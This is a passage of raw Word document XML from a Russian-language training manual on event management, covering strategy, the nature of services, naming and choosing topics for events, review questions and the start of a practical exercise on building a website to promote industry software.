      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы определить свою стратегию, необходимо понять, что вам нужно от бизнеса, чего вы намереваетесь добиться. </w:t>
      </w:r>
      <w:r w:rsidR="00885449" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Т.е.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> любой проект – это отражение какой-либо бизнес-идеи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Чтобы разработать стратегию, необходимо поставить цель, осознать свои собственные устремления и желания.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Хотите ли вы стать </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>первым парнем на деревне</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, или ваша цель – организация мероприятий, на которых будут выступать Президент страны или премьер-министр?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Получаете ли вы удовольствие от нескончаемого потока новых знакомств и встреч?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Удовлетворитесь ли вы положением эксперта-лидера в какой-то одной отрасли либо претендуете на более широкий охват?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Наконец, не следует забывать, что в итоге вы должны получить какие-то деньги, необходимые для вашего существования и для поддержания или развития вашей компании. Так какие деньги вас устроят?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Следующий шаг в построении стратегии – это поиск средств достижения цели и ответа на вопрос: </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Каким образом можно достичь этой глобальной цели?</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> То есть вы начинаете разбивать свой путь к высшей цели на ряд промежуточных этапов, каждый из которых должен быть также конкретным по результату и конечным во времени.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Уместно сразу же заметить, что не следует слишком уповать на стратегию, на глобальные планы. На пути к их достижению, вполне вероятно, может встретиться поворот, который уведет совершенно в иную сторону. Другими словами, ваши конкретные практические шаги (т.е. тактика) могут существенно изменить стратегические замыслы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если же таких поворотов появится одновременно несколько, и все они выглядят привлекательными, то не уподобляйтесь буриданову ослу, следуйте по любому из этих путей. Только не стойте на месте, идите.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В то же время не следует хвататься за все сразу. В практике работы компаний, которые предоставляют услуги своим клиентам (а event-бизнес – это именно оказание услуг), сложилось правило, что более узкая специализация повышает привлекательность фирмы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Причем речь идет о привлекательности сразу в двух аспектах. С одной стороны, вы наращиваете и укрепляете деловые связи среди лидеров какой-то отрасли, которые могут в дальнейшем стать членами Оргкомитета вашего мероприятия или выступить в качестве интересных докладчиков.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>С другой стороны, вы формируете и расширяете адресную базу данных потенциальных участников, завоевываете необходимый авторитет в широких слоях какой-либо отрасли.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если вы со всеми перечисленными проблемами справились и живете в согласии со своими устремлениями, то пора от философии переходить к практическому вопросу: как при этом, кроме получения удовольствия, зарабатывать деньги.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Прежде всего, необходимо осознать, что ваше мероприятие – это товар, точнее услуга, которую вам предстоит продать.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Самое главное отличие услуги от товара – ее неосязаемость. Услугу невозможно попробовать и оценить до начала потребления. Это очень важно, поскольку ваш покупатель находится в состоянии неопределенности, он не видит реальной ценности и привлекательности того, что собирается приобрести. Фактически участник вашего мероприятия оказывает вам кредит доверия, который нельзя не оправдать.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Другое важное отличие услуги от товара – ее невозможно сохранить. Иными словами, ваше мероприятие имеет значение для потребителей лишь в ходе проведения. Ни до, ни после оно не существует, его не поставишь в гараж или на полку.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Следующее отличие услуги от товара связано с тем, что она неотделима от своего производителя, и, как правило, производство реализуется одновременно и в том же месте, что и потребление.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Еще одно отличие услуги – непостоянство качества. Вы можете великолепно провести одно мероприятие, но завалить следующее по самым невероятным причинам. Помните: </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>...не было гвоздя – подкова упала</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>? В этом отношении крайне велика роль каждого участника вашей команды. Кроме того, в этом бизнесе нет мелочей. Правильнее сказать, их огромное множество, и каждая может иметь решающее значение. К этому мы еще не раз вернемся.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Наконец, ваша услуга является многофункциональной, поскольку каждый участник приходит на мероприятие со своими, порой многочисленными, целями и задачами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">В современной деловой литературе имеется достаточно книг, где подробно описаны требования к ходовому товару. Поэтому не будем останавливаться на общей теории. Можно хорошо знать теорию – и, тем не менее, как говорится, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>влететь</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">А на практике мы должны опять вернуться к вопросу о целях, но на этот раз к целям промежуточным, к тем, которые достигаются в результате выполнения отдельных этапов. Другими словами, нужно понять, чего вы хотите добиться, продавая свой </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>товар</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Не забывайте, что </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>как корабль назовешь, так он и поплывет</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Кроме термина, обозначающего формат (см. классификацию ранее), название мероприятия должно четко отразить ключевую идею. Оно должно быть ярким, броским, запоминающимся, отражающим суть.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выбор названия мероприятия сродни выбору слогана, используемого для продвижения фирмы или товара. Здесь можно и нужно использовать те же самые принципы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Особенно важно не забывать нумеровать мероприятие, если оно проводится уже не первый раз. Любому человеку ясно: если его приглашают принять участие хотя бы в пятой конференции </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Использование микротехнологий в авиации и космонавтике</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, то это мероприятие уже имеет свою историю, своих постоянных участников, свои традиции. Его уже можно отнести к категории </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>раскрученных</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Даже если ранее вы о нем не слышали, пятилетний возраст уже позволяет думать о том, что это – не пустая затея.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>С названием тесно связан следующий важный пункт, которым должна заниматься рабочая группа: выбор тематики мероприятия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Здесь, как и в случае с форматом, не следует болеть гигантоманией, не стоит гнаться за всеми зайцами сразу. Выберите одного-двух, но самых жирных.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Бывают, разумеется, успешные мероприятия, где обозначаются практически все возможные направления выбранной отрасли. Но среди них имеют право на жизнь лишь те, что готовятся крупными ассоциациями, лидерами отрасли.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При определении тематики крайне важна роль специалиста-консультанта, который может четко очертить границы мероприятия, отметить самое интересное, самое злободневное, но, в то же время, логически увязанное между собой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Таким образом, мы осознали, какой </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>товар</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> хотим вынести на рынок, т.е. что будем продавать. Мероприятие начинает приобретать конкретные очертания. Поэтому естественным образом можно перейти к следующему вопросу: кому вы собираетесь его продавать? Кто этот </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>товар</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> купит? Кстати, в зависимости от ответа тематические направления можно сформулировать различным образом.</w:t>
      </w:r>
      <w:r w:rsidR="00885449" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Другими словами, мы переходим к сегментированию рынка или выбору целевых групп.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое покупательская конференция?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Что такое целевая аудитория?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Какие материалы необходимо подготовить для проведения покупательской конференции?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3FFC" w:rsidRPr="00617AC0" w:rsidRDefault="00DB3FFC" w:rsidP="007755F7">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="218" w:name="_Toc507788275"/>
      <w:bookmarkStart w:id="219" w:name="_Toc507788550"/>
      <w:bookmarkStart w:id="220" w:name="_Toc26278752"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Практическое занятие № </w:t>
      </w:r>
      <w:r w:rsidR="00CF0A98" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>33</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Разработка сайта для продвижения программного обеспечения отраслевой направленности (</w:t>
      </w:r>
      <w:r w:rsidR="00CF0A98" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> часов)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="218"/>
      <w:bookmarkEnd w:id="219"/>
      <w:bookmarkEnd w:id="220"/>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>формирование навыков продвижения программного обеспечения. Разработка сайта как метод продвижения программного обеспечения отраслевой направленности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137383" w:rsidRPr="00617AC0" w:rsidRDefault="00137383" w:rsidP="007755F7">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137383" w:rsidRPr="00617AC0" w:rsidRDefault="00137383" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137383" w:rsidRPr="00617AC0" w:rsidRDefault="00137383" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Студент продвигает товар компании, которую выбрал в практической работе № 41</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
